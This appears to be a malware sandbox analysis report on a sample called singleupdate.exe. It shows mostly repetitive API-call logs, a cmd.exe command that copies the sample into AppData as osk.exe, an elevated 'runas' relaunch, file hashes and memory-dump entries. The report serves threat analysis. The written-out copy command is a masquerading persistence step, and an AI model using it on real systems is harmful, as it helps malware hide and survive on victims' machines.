| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
|
For performance reasons, the remaining 790 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #2: cmd.exe
67
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:49, Reason: Child Process |
| Unmonitor | End Time: 00:03:02, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa8c |
| Parent PID | 0xfa0 (c:\users\fd1hvy\desktop\singleupdate.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
714
0x
824
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00C00000 | 0x00C58FFF | Process Termination | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\FD1HVy\Desktop\singleupdate.exe | 746.00 KB |
MD5:
545c7d2d0c5b7686dd4a2012399148a9
SHA1: a481c02f8cb988279431aae959b2cbc2638443cb SHA256: 3e4f8a1598f9dd834766d5184c3347947a201ff9a559fa275f048b14267d7f8a SSDeep: 12288:S9CZOU8dEgeDiSrnR32F8RB1laLv6GcxJ5Wj/o9ZPlThRqdbMSz+NHH+gD1axZF8:jZOU8dEgeDDrnR3losxyU9ZNThSwNHHr |
|
|
Threads
Thread 0x714
67
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\WINDOWS\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, type = file_attributes |
|
1 | |
| Process | Get Info | type = PROCESS_PAGE_PRIORITY |
|
1 | |
| File | Create | filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | - |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Open | - |
|
1 | |
| File | Read | size = 512, size_out = 512 |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe, type = file_attributes |
|
2 | |
| File | Copy | source_filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, destination_filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe, type = file_attributes |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 27 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #5: singleupdate.exe
2709
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\fd1hvy\desktop\singleupdate.exe |
| Command Line | "C:\Users\FD1HVy\Desktop\singleupdate.exe" runas |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:03, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe64 |
| Parent PID | 0xfa0 (c:\users\fd1hvy\desktop\singleupdate.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7F0
0x
9E0
0x
E90
0x
F28
0x
ED0
0x
E98
0x
4A8
0x
4A4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Marked Writable | - | 32-bit | - |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00401110 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040EB38, 0x0040F130 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040B764 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00417D3C |
|
|
|
